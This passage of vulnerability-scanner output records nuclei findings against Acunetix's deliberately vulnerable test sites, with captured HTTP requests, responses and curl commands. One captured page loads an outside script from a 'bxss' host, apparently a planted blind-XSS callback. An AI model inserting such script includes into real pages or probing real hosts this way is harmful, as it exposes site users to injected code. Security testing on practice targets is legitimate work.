class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:55.132325689Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:55.132530267Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:55.930760767Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca 